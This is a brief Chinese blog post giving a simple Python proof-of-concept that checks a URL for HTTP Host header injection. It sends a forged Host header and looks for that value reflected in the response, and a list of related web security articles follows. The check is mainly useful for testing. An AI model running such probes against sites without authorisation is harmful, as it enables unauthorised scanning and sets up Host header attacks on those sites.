python3基础学习(http host头攻击漏洞POC)

简介:

  简单版http host头攻击漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下:

from urllib import request
import sys
import re
url=sys.argv[1]
header={'Host' : 'www.eth10.com'}

req=request.Request(url,headers=header)
u = request.urlopen(req)
resp = u.read()

if re.match('.*www.eth10.com',str(resp)):
    print('漏洞存在')
else:
    print('不存在该漏洞')

  使用语法:python3 host.py URL,URL格式为:http://xx.xx.xx


本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/2052582


相关文章
|
3月前
|
缓存 移动开发 安全
Web安全-HTTP响应拆分(CRLF注入)漏洞
Web安全-HTTP响应拆分(CRLF注入)漏洞
197 1
|
3月前
|
Java Maven Kotlin
vertx的学习总结7之用kotlin 与vertx搞一个简单的http
本文介绍了如何使用Kotlin和Vert.x创建一个简单的HTTP服务器,包括设置路由、处理GET和POST请求,以及如何使用HTML表单发送数据。
52 2
vertx的学习总结7之用kotlin 与vertx搞一个简单的http
|
3月前
|
JSON 缓存 JavaScript
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
148 1
|
3月前
|
缓存 移动开发 前端开发
HTTP请求走私漏洞原理与利用手段分析
HTTP请求走私漏洞原理与利用手段分析
65 1
|
4月前
|
缓存 移动开发 安全
Web安全-HTTP响应拆分(CRLF注入)漏洞
Web安全-HTTP响应拆分(CRLF注入)漏洞
225 8
|
4月前
|
缓存 安全 应用服务中间件
Web安全-HTTP Host头攻击
Web安全-HTTP Host头攻击
186 7
|
4月前
|
缓存 安全 应用服务中间件
Web安全-HTTP Host头攻击
Web安全-HTTP Host头攻击
275 3
|
5月前
HTTP慢速攻击详解
HTTP慢速攻击详解
67 7
|
5月前
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
|
6月前
|
安全 Python
【Python】已完美解决:WARNING: The repository located at mirrors .aliyun.com is not a trusted or secure host
【Python】已完美解决:WARNING: The repository located at mirrors .aliyun.com is not a trusted or secure host
407 1